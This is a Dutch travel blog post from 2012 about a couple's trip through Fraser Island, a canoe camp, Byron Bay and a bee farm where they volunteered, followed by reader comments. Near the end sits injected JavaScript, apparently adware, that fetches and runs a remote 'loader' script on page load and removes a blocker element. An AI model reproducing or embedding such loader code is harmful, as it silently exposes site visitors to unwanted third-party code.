rossaustralie.reismee.nl

5 Juni 2012

Zoals we in ons vorige verslag al lieten weten hadden we een 1 day tour op Fraser Island op de planning staan. En het was geweldig! Het is het grootste zand eiland ter wereld en je mag er alleen rondrijden met 4 wheel drives. We hadden een van de weinige tours in jeeps ipv. speciale tour bussen, met in elke jeep een tour guide. Er was zelfs een Aboriginal mee. De Aboriginal was de “song man” van zijn tribe. En hij verwelkomde ons dan ook met een origineel intro lied + dans op het eiland. We hebben gezwommen in Lake McKenzie, een helder groot meer dat enkel bestaat uit regenwater. We zijn via de “snelweg” (volgens de gids het enige strand dat officieel als snelweg aangegeven staat) naar een shipwreck op het strand en langs verschillende “mannen” en “vrouwen” plaatsen (volgens Aboriginal regels) gereden. Ze waren hier bijzonder strikt in. Zo mochten vrouwen de didgeridoo niet aanraken omdat het een van de “mannen zaken” was, en hadden ze liever niet dat mannen bij het gekleurde zand kwamen omdat het een van de “ vrouwen zaken” was. Dit omdat er volgens hen alleen maar problemen ontstaan als vrouwen zich met mannen zaken bemoeien en andersom. De enige uitzonderingen die genoemd werden was bij een vrouwen meer waar een man 1 keer in zijn leven mocht komen, bij zijn geboorte dus. En als er geen mannen meer in de stam leven mocht een van de oudere vrouwen digeridoo gaan bespelen om het instrument in leven te houden.

Daarna gingen we door naar Indian Head. Zo genoemd omdat de ontdekker van het eiland dicht langs de kust voer om het land in kaart te brengen toen de aboriginals het schip aanzagen voor een gevaar en op Indian Head speren en boomerangs gingen gooien. Om een of andere reden dacht de ontdekker dat het indianen waren, dus vandaar de naam.

We zijn ook nog gestopt bij de Champagne Pools waar we ons hoofd hebben laten overspoelen met… zout water. Dat viel dan weer wat tegen.

En toen gingen we weer terug naar de ferry over dezelfde “snelweg”. Met vloed was de “weg” op bepaalde plaatsen enkel nog zee en zaten de wielen 3 kwart onder water.

Op onze reis naar de kano tocht hebben we 2 nachten op dezelfde parkeerplaats gestaan omdat ons kamp voor zondag geboekt was en het was nog maar vrijdag. Hier ontmoete we een oude man die na een kort gesprek ons al uitnodigde om een biertje te drinken en zijn muziek te luisteren. Hij was muzikant en reisde tot hij zijn huis klaar had net als ons in een busje van vriend naar vriend. Hij was ook nog een actieve surfer die ons graag zijn verhalen deelde. Zodra zijn nieuwe album uitkomt is hij bereid ons gratis een doos te sturen wanneer we terug zijn. Maar tot die tijd moeten we het doen met 10 cd’s aan Australische muziek. Geweldig voor onderweg.

Het moment dat we op het kano kamp aankwamen viel het gelijk al op hoe creatief dit kamp in elkaar was geprutst. Zolang het maar werkt toch? Een oude boomstam die omgebouwd was tot wastafel compleet met spiegel klinkt natuurlijk geweldig, maar op de foto is wel te zien wat we bedoelen. De 1e nacht hebben we vooral genoten van het gratis pool met 2 Nederlandse meiden die we tegenkwamen. We sliepen in een soort hangmatjes in een groot muggennet waar we meer dan blij waren met onze slaapzakken. De temperatuur begint al wat te dalen en dat is vooral savonds te merken.

De eerste kano tocht was top. We zijn van 9 tot 4 op/aan het water geweest. Grote pauzes aan een mooi strand en een swing waarmee je in de rivier kon duiken. Onderweg zagen we nog een klein krokodilletje en vele vogels die hun vleugels lieten drogen in de zon, een prachtig gezicht.

De 2e dag was iets minder. We zouden via de rivier naar een meer gaan waar we de kano’s op de kant zouden laten om naar de zee te lopen (kleine 3 kilometer). Maar door de regen gingen we met 4 kano’s ipv. de 6 van de vorige dag omdat een aantal mensen het te nat vond in dit weer (en ze hadden de vorige avond teveel gedronken. Zonde). Desondanks hebben we weer een leuke dag gehad. Het was droog genoeg om met jas aan op het strand te liggen en te kaarten. En de groep was gelukkig nog gezellig.

Toen het kamp voorbij was zijn we zo snel mogelijk naar Byron Bay gegaan. Dit geweldige hippie dorpje had slechts 2 nadelen. Het was er duur om te overnachten en het regende. Desondanks hebben we genoten van de regenboog winkeltjes het strand en de vuurtorenwandeling. Het was bijzonder typisch alle hippies rond te zien lopen. De meesten waren 40+ maar daar gaat het niet om. Helaas zijn we er vanwege de prijzen snel weer weg gegaan. We hebben nog wat scenic routes gereden langs watervallen en bloemen dalen.

En toen zijn we direct naar Ralph gereden (een 9 uur lange rit die Ross met wat pauzes goed vol hield). Ralph is de WWOOF host waar we aan het begin van onze reis 3 weken waren gebleven, en we waren gelukkig weer welkom. Het huis was ondertussen alweer helemaal verandert. In onze afwezigheid had hij ongeveer 20 andere WWOOFers langs gehad en van binnen was het bijna onherkenbaar. Deuren waren verplaatst. Kamers waren verdwenen of juist verschenen. En misschien nog wel het belangrijkste, de router was verplaatst dus je had nu overal in het huis internet! We hebben hier een week lang was van de bijen rekjes gesmolten, kisten schoon gemaakt, stenen gesjouwd en een openhaard geinstaleerd. Allemaal in rustig tempo met een beloning van een goed bed, gratis internet en geweldig eten. Helaas konden we niet langer blijven dan een week omdat we optijd in Darwin willen zijn om de auto te verkopen en met wat geluk nog even te werken. Maar eerst de Great Ocean Road even opzoeken met een nieuwe voorraad honing!

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Michiel

Excuses voor de vreemde tekst op het eind, ik heb geen idee waar die vandaan komt.

Kelly

Hee jongens, het ziet er weer fantastisch uit. Een zandeiland, een gezellige vrijgevige muzikant, een weekje terug naar de bijen, en dan de geliefde Eddie verkopen. Hopelijk krijgen jullie alles mee op hart vliegtuig terug (cd's, honing, een kangoeroe, Ross' enorme baard...) Moet lukken :p